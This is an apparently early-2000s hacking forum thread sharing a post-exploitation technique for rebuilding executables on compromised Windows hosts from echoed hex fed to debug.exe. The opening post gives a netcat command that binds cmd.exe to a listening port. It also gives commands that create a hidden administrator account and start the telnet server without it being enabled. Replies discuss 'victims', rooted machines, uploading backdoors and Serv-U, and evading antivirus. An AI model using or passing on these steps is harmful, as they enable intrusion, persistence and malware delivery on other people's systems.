//EDIT: see page 8, better ftp.txt posted.
I recommend to use a tool like SecureCRT, SSH1-2, Telnet Client (faster to copy/past the huge .txt)
Copy paste all into securecrt, it creates ftp.bat, then run ftp.bat , it will create ftp.exe.
Nb: I packed ftp.exe to make the debugging smaller.
See page 2 to dl ftp.bat to test locally if you are too lazy to mod the txt.
Of course for the guys who dunno , ftp.exe here is an example , you can update to another executable.
the .txt is also attached to the thread at the bottom.
Tested on 9x/XP
//EDIT: 2k was bugging, sorry my mistake, fixed version see page 8.
njoy this example ;P
Full Version: Nasty Method, @echo This Txt To Create Ftp.exe
| CODE |
ECHO @ECHO OFF^>1>ftp.bat ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>> etc.. etc ... 1096 lines .. to big for the threads .. look at the attached file |
NOW SOME SMALL TIPS
TIP1: Thats easy to use SecureCRT in binding mode , you just have to connect with a telnet method the port, then copy past all the txt at 1 time.
But in listening ?
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p
TIP2:
You are on a system/admin rights shell without the possibility to copy paste the .txt ?
create a user
net user USER PASS /add
net localgroup Administrators USER /add
type tlntsvr.exe , try to connect to the ip port 23 with SecureCRT, it will refuse.
type a second time tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, telnet server is now started without to be enabled.(yes I tested it succesfully)
login with your created USER/PASS.
Your are know under a shell with Telnet & SecureCRT thats a big step.
But because you use telnet, you 'll have to copy past the lines 10 per 10.
(I tested , it's not so long , and working)
I had finally a ftp.exe created with the help of a really bad shell at start.
***************
If you can't make it working nm , me i successfully used it on everybox where
ftp/tftp were missing. You need of course some resources in your brain to find a way to copy paste the huge txt in all situations.
I hope my resources helped you , bye
cool what a nice method 
wonderful
thanks for share it
thanks for share it
nice method thx ....
but where can me dl the tool for faster copy/past ?!
thx
but where can me dl the tool for faster copy/past ?!
thx
Finding it on google isn't hard:
hxxp://www.vandyke.com/products/securecrt/index.html
Seek and you shall find what you're after.
Interesting method 101, not sure how practical it would be, interesting none the less.
hxxp://www.vandyke.com/products/securecrt/index.html
Seek and you shall find what you're after.
Interesting method 101, not sure how practical it would be, interesting none the less.
This definitely seems like a nice "util"...
I'm gonna give it a test on my own machine, just to see what it does exactly...
Thanks a lot for putting thit together, and sharing this with us m8!
Zyne
I'm gonna give it a test on my own machine, just to see what it does exactly...
Thanks a lot for putting thit together, and sharing this with us m8!
Zyne
Hi, thx for this, but i dunno how it works ...
I tried to rename the ftp.txt to ftp1.bat und executed it but it was not workin .. an idea?
[EDIT]
Ok, now it is workin, sry i was 2 dumb 4 it :/
I tried to rename the ftp.txt to ftp1.bat und executed it but it was not workin .. an idea?
[EDIT]
Ok, now it is workin, sry i was 2 dumb 4 it :/
yes this method is nice!
i'm using it quite long now
but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp
that way u never have probs with uploading the files
greetz
i'm using it quite long now
but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp
that way u never have probs with uploading the files
greetz
Whow! Never thought this was possible.. Kewl gonna try it
Thanks alot for this class101.
annoying when u root a puter and they removed ftp.exe
thanks alot matey
annoying when u root a puter and they removed ftp.exe
thanks alot matey
wow nice way man , its a bit complicated but its the best and i think this wont be ever detected by AVs
big THX 101
for sharing this
for sharing this
Methinks this could be useful.....
thnx nice util:D
anybody tested that the ftp.exe works?
nice util:Danybody tested that the ftp.exe works?
C:\WINNT\>ftp.exe
ftp.exe
C:\WINNT\>
hmmm
WOrk u ? : |
ftp.exe
C:\WINNT\>
hmmm
WOrk u ? : |
thx a lot for this nice method
Yeah this do fxp.exe but someone tested this ftp.exe and work ? :|
of course it worx. tested it locally and remotely. both ways worked fine. y shouldnt it work? ^^
Mhmmm
i give this echo command
next ftp.bat run and execute ftp.exe and this file not work ... i will go testing again
i give this echo command
next ftp.bat run and execute ftp.exe and this file not work ... i will go testing again
The .txt is the way to create this .bat from a cmd line with ECHO commands.
here is the .bat if u wanan test direclty on your computer.
so, this thread is not to teach u how to use ftp.exe ... u can also do it with list.exe, kill.exe , ur backdoor y not ;Q , ftp is just a helpful example for who need ;<
Yeah this bat work but i tested this echo command and i dont know but dont work but will testing again later :)
fine thx..tested it locally
the ftp.exe is created, but when i try to use that ftp.exe i get an error but only on my w2k german sp4
on a remote machine w2k3 server eng it had worked very well !
but who cares the method is the key thx !
the ftp.exe is created, but when i try to use that ftp.exe i get an error but only on my w2k german sp4
on a remote machine w2k3 server eng it had worked very well !
but who cares the method is the key thx !
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that
| QUOTE (boshcash @ Mar 14 2004, 06:03 PM) |
| i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that |
i think you could just use any hex editor
Innovation is the KeyWord
i really Congratualte 101 for
showing a very simple yet
impressive method where we
can take advantage of just
the Swiss Army Knife alone.
i really Congratualte 101 for
showing a very simple yet
impressive method where we
can take advantage of just
the Swiss Army Knife alone.
Nice idea.... will have to give it a go and see if I can get the thing working myself... like it though... good thinking!!
nice idea, i have allready posted, itīs a the hex of an exe, and debug.exe, on all winows machine "compile" this to an exe. it dosnīt work on nt40 machines. you
can allready use an other apps, like cmdget.exe only 1.5kb, download files from
http://*. you can convert exe to the hex-format with bin2src, then you must
change the header, in the first line from .exe to none executable extension like
sys. txt or other, because debug.exe "canīt build a executable". after the compilation you change the *.txt to *.exe and you have a working exe.
can allready use an other apps, like cmdget.exe only 1.5kb, download files from
http://*. you can convert exe to the hex-format with bin2src, then you must
change the header, in the first line from .exe to none executable extension like
sys. txt or other, because debug.exe "canīt build a executable". after the compilation you change the *.txt to *.exe and you have a working exe.
@yopman: r u sure that u can convert it with bin2src? i searched with google, downloaded it and i found out that i can only convert exe-file into c, basic or pascal code with it... but we need hex code ^^
@101: which program did u use to convert the exe? would be nice if u could tell us
greetz,
buzz
@101: which program did u use to convert the exe? would be nice if u could tell us
greetz,
buzz
after doing some research i found a handy tool called exe2hex
i would attach it here but here's no button to attach the file (cause i'm trial???)
found this in the board-helpsystem
If the admin has enabled it, you will also see a file attachments option, this will allow you to attach a file to be uploaded when making a post. Click the browse button to select a file from your computer to be uploaded. If you upload an image file, it may be shown in the content of the post, all other file types will be linked to.
???
btw. the tools works really perfekt..very simple usage
exe2hex.exe inputfile outputfile
debug < outputfile
it shouldn't be a problem to create a bat or echo.txt based on the outputfile
i would attach it here but here's no button to attach the file (cause i'm trial???)
found this in the board-helpsystem
If the admin has enabled it, you will also see a file attachments option, this will allow you to attach a file to be uploaded when making a post. Click the browse button to select a file from your computer to be uploaded. If you upload an image file, it may be shown in the content of the post, all other file types will be linked to.
???
btw. the tools works really perfekt..very simple usage
exe2hex.exe inputfile outputfile
debug < outputfile
it shouldn't be a problem to create a bat or echo.txt based on the outputfile
clever stuff its like u programmed it in binary on the computer
wonderif u could do the same with servu or other apps
how did u get the binary code for ftp.exe anyway?
wonderif u could do the same with servu or other apps
how did u get the binary code for ftp.exe anyway?
u need the hex code of the file not the binary ...how to do ? read one post above
btw this should work with any *.exe
btw this should work with any *.exe
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
the solution is maybe not so far,
njoy your research
(nother example , creates list.exe, process listener)
njoy your research
(nother example , creates list.exe, process listener)
Wow this is interesting, nice find 101! But what advantes does this prove over other methods?
i have written a handy tool in c# together with exe2hex u now need some seconds
to create a createmyprogramm.bat ...
i have testet this method with nc.exe/ftp.exe/psinfo.exe works well =)
is it possible to allow me to attach files?
@iWeasel u don't have to upload anything !
to create a createmyprogramm.bat ...
i have testet this method with nc.exe/ftp.exe/psinfo.exe works well =)
is it possible to allow me to attach files?
@iWeasel u don't have to upload anything !
great work
thks for the info
thks for the info
Nice tool (hehe 
).
brOmstar send it to me ill attach it, or ask a mod to post the file for you.
).brOmstar send it to me ill attach it, or ask a mod to post the file for you.
iīm sorry bin2dbg
k gotisch i will send the both tools to you(think tomorrow in the morning)... together with an explaination how to use them =)
Thanx for the great info 101,thats some really great stuff,although br0mstar's program will be here soon and I can't add attatchments either,but i'll ad the websites link to the exe2hex program.
exe2hex compiled:http://www.g615.co.uk/riftor/exe2hex.exe
exe2hex C sourcecode:http://www.g615.co.uk/riftor/exe2hex.c
exe2hex compiled:http://www.g615.co.uk/riftor/exe2hex.exe
exe2hex C sourcecode:http://www.g615.co.uk/riftor/exe2hex.c
this rocks.
Very nice work! Gonna test it very helpfull! Gonna try making a new method of breaking SQL_ERROR *g*
Thx very nice worked fine
Greetz
BigBen
Greetz
BigBen
Heh This always comes in handy Thanx for this post! Tested it and it worked indeed
Thanx for this post! Tested it and it worked indeed
very interesting method ...
will try it out asap and let you all know if it works
will try it out asap and let you all know if it works
thx alot yopman! that was the one i was looking for
btw it worx with serv-u, too
nice nice nice...
greetz,
buzz
btw it worx with serv-u, too
nice nice nice...
greetz,
buzz
i got exe2hex and everything worked fine , bromstar when u finish the program tell me to post it for u
Because programs automates many thing which are :
-adding echo to everyline and output to selected batch name that u want to be created
-converting the exe to binary easily without command line
-adding the n filename.sys line (did u successfully do this or the file created requires manual edit ?
Thanks alot for creator of this way , and when u get the program ready bromstar plz tell me
Because programs automates many thing which are :
-adding echo to everyline and output to selected batch name that u want to be created
-converting the exe to binary easily without command line
-adding the n filename.sys line (did u successfully do this or the file created requires manual edit ?
Thanks alot for creator of this way , and when u get the program ready bromstar plz tell me
realy usefull
it's realy
when there is not ftp.exe
( tested it and it works fine
)
it's realy
when there is not ftp.exe( tested it and it works fine
)
I used to do this sort of thing with linux.
Glad nt has apapted it now.
Glad nt has apapted it now.
interesting idea. personally, ive never encountered a situation where tftp and ftp were both not available, but i'll keep this one in reserve for that rainy day.
Cheers m8
Cheers m8
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
